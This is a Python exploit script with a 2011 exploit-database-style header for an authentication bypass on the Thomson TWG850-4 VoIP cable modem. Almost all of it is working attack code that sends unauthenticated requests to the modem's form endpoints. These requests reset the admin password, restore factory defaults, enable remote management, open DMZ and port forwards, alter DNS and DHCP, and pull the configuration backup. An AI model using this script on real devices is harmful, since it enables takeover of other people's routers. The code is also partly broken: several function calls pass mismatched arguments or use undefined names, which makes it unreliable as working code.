|
# Exploit Title: Thomson Wireless VoIP Cable Modem Auth Bypass
# Date: February 22, 2011
# Author(s): Glafkos Charalambous, George Nicolaou
# Product: TWG850-4 Wireless VoIP Cable Modem
# Software Version: ST9A.01.06
# Severity: High
# Other Vulnerabilities:
# Unauthenticated Backup File Access,
# Plaintext Protocol succeptible to sniffing attacks
import argparse
import httplib
import urllib
import urllib2
def http_post( ip, port, request, params ):
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-us;en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Keep-Alive":"115",
"Connection":"keep-alive",
"Content-type":"application/x-www-form-urlencoded"
}
con = httplib.HTTPConnection(ip,port)
con.request("POST", request, params, headers)
response = con.getresponse()
def block_domain( ip, port, host ):
http_post( ip,port,
"/goform/RgUrlBlock",
urllib.urlencode( {"cbDomainBlocking":"0x2","BasicParentalNewKeyword":0, "BasicParentalKeywordAction":0, "BasicParentalDomainList":0, "BasicParentalNewDomain":host,"BasicParentalDomainAction":1} )
)
def block_keyword( ip, port, host ):
http_post( ip,port,
"/goform/RgUrlBlock",
urllib.urlencode( {"cbKeywordBlocking":"0x1", "BasicParentalNewKeyword":host,"BasicParentalKeywordAction":1, "BasicParentalNewDomain":"0", "BasicParentralDomainAction":0} )
)
def password_reset( ip, port, user="admin", passwd="admin" ):
http_post(ip,port,
"/goform/RgSecurity",
urllib.urlencode({"HttpUserId":user, "Password":passwd, "PasswordReEnter":passwd, "RestoreFactoryYes":"0x00" })
)
def factory_defaults( ip, port, user="admin", passwd="admin" ):
http_post(ip,port,
"/goform/RgSecurity",
urllib.urlencode({"HttpUserId":user, "Password":passwd, "PasswordReEnter":passwd, "RestoreFactoryYes":"0x01" })
)
def dhcp_config( ip, port, localip="10.1.0.1", localsub="255.255.255.0", leasepoolstart="10.1.0.10", leasepoolend="10.1.0.100" ):
http_post(ip,port,
"/goform/RgSetup",
urllib.urlencode({"LocalIpAddressIP":localip, "LocalSubnetMask":localsub, "DhcpServerEnable":"0x1000", "DhcpLeasePoolStartLAN":leasepoolstart, "DhcpLeasePoolEndLAN":leasepoolend, "LeaseTime":"604800" })
)
def dyn_dns( ip, port, dnsuser="user", dnspass="pass", dnshost="host.dyndns.org" ):
http_post(ip,port,
"/goform/RgDdns",
urllib.urlencode({"DdnsService":1, "DdnsUserName":dnsuser, "DdnsPassword":dnspass, "DdnsHostName":dnshost })
)
def sntp_set( ip, port, server1="clock.via.net", tserver2="ntp.nasa.gov", tserver3="tick.ucla.edu" ):
http_post(ip,port,
"/goform/RgTime",
urllib.urlencode({"TimeSntpEnable":1, "TimeServer1":tserver1, "TimeServer2":tserver2, "TimeServer3":tserver3, "TimeZoneOffsetHrs":0, "TimeZoneOffsetMins":0, "ResetSntpDefaults":0 })
)
def backup_config( ip, port, fName="GatewaySettings.bin" ):
u = urllib2.urlopen('http://' + ip+":"+port + '/GatewaySettings.bin')
lFile = open(fName, 'w')
print "File "+fName+" saved successfully"
lFile.write(u.read())
lFile.close()
def remote_manage( ip, port, status ):
if status == 'enable':
http_post(ip,port,
"/goform/RgOptions",
urllib.urlencode({"cbIpsecPassThrough":"0x20", "cbPptpPassThrough":"0x40", "cbRemoteManagement":"0x80", "cbOptMulticast": "0x20000", "cbOptUPnP":"0x200000", "cbOptNatSipAlg":"0x89"})
)
elif status == 'disable':
http_post(ip,port,
"/goform/RgOptions",
urllib.urlencode({"cbIpsecPassThrough":"0x20", "cbPptpPassThrough":"0x40", "cbOptMulticast": "0x20000", "cbOptUPnP":"0x200000", "cbOptNatSipAlg":"0x89"})
)
else:
print "The argument you specified is not accepted"
def dmz_set( ip, port, dmzhost ):
http_post(ip,port,
"/goform/RgDmzHost",
urllib.urlencode({"DmzHostIP3":dmzhost})
)
def port_forward( ip, port, localip, startport, endport ):
http_post(ip,port,
"/goform/RgForwarding",
urllib.urlencode({"PortForwardAddressLocal1IP3":localip, "PortForwardPortGlobalStart1":startport , "PortForwardPortGlobalEnd1":endport , "PortForwardProtocol1":"254", "PortForwardEnable1":"0x01" })
)
def main():
status = ['enable', 'disable']
argp = argparse.ArgumentParser(description='Thomson Cable Modem Auth Bypass v0.1')
argp.add_argument("-pr", "--password_reset", nargs=2, help="Reset Admin Account", metavar=("user","pass"))
argp.add_argument("-fd", "--factory_default", nargs=2, help="Reset Factory Defaults", metavar=("user","pass"))
argp.add_argument("-bk", "--block_keyword", help="Block Web Access based on Keyword(s)", metavar="keywrd1,keywrd2,...,keywrdN")
argp.add_argument("-bd", "--block_domain", help="Block Web Access to Specific Domain(s)",metavar="domain1,domain2,...,domainN")
argp.add_argument("-dc", "--dhcp_config", nargs=4, help="Configure DHCP Settings",metavar=("localip","localsub","leasepoolstart", "leasepoolend"))
argp.add_argument("-dd", "--dyn_dns", nargs=3, help="Configure Dynamic DNS",metavar=("user", "pass", "host"))
argp.add_argument("-ss", "--sntp_set", nargs=3, help="Configure SNTP Settings",metavar=("timeserver1", "timeserver2", "timeserver3"))
argp.add_argument("-bg", "--backup_config", help="Download Backup Configuration", metavar=("filename"))
argp.add_argument("-rm", "--remote_manage", help="Enable Remote Config Management", metavar=("enable/disable"))
argp.add_argument("-ds", "--dmz_set", help="Set DMZ Host. Use last 3 digits for IP Address", metavar=("ip"))
argp.add_argument("-pf", "--port_forward", nargs=3, help="Configure Port Forwarding", metavar=("ip", "startport", "endport"))
argp.add_argument("IP", help="IP Address")
argp.add_argument("PORT", help="Port Number")
args = argp.parse_args()
if(args.password_reset != None):
password_reset( args.IP, args.password_reset[0], args.password_reset[1] )
if(args.factory_default != None):
factory_default( args.IP, args.factory_default[0], args.factory_default[1] )
if(args.block_keyword != None):
for keyword in args.block_keyword.split(","):
block_keyword(args.IP, keyword)
if(args.block_domain != None):
for domain in args.block_domain.split(","):
block_domain( args.IP, domain )
if(args.dhcp_config != None):
dhcp_config( args.IP, args.dhcp_config[0], args.dhcp_config[1], args.dhcp_config[2], args.dhcp_config[3] )
if(args.dyn_dns != None):
dyn_dns( args.IP, args.dyn_dns[0], args.dyn_dns[1], args.dyn_dns[2] )
if(args.sntp_set != None):
sntp_set( args.IP, args.sntp_set[0], args.sntp_set[1], args.sntp_set[2] )
if(args.backup_config != None):
backup_config( args.IP, args.backup_config )
if(args.remote_manage != None):
remote_manage( args.IP, args.PORT, args.remote_manage )
if(args.dmz_set != None):
dmz_set( args.IP, args.PORT, int( args.dmz_set ))
if(args.port_forward != None):
port_forward( args.IP, args.PORT, args.port_forward[0], args.port_forward[1], args.port_forward[2] )
if __name__ == "__main__":
main()
|
推荐
评论(0条)
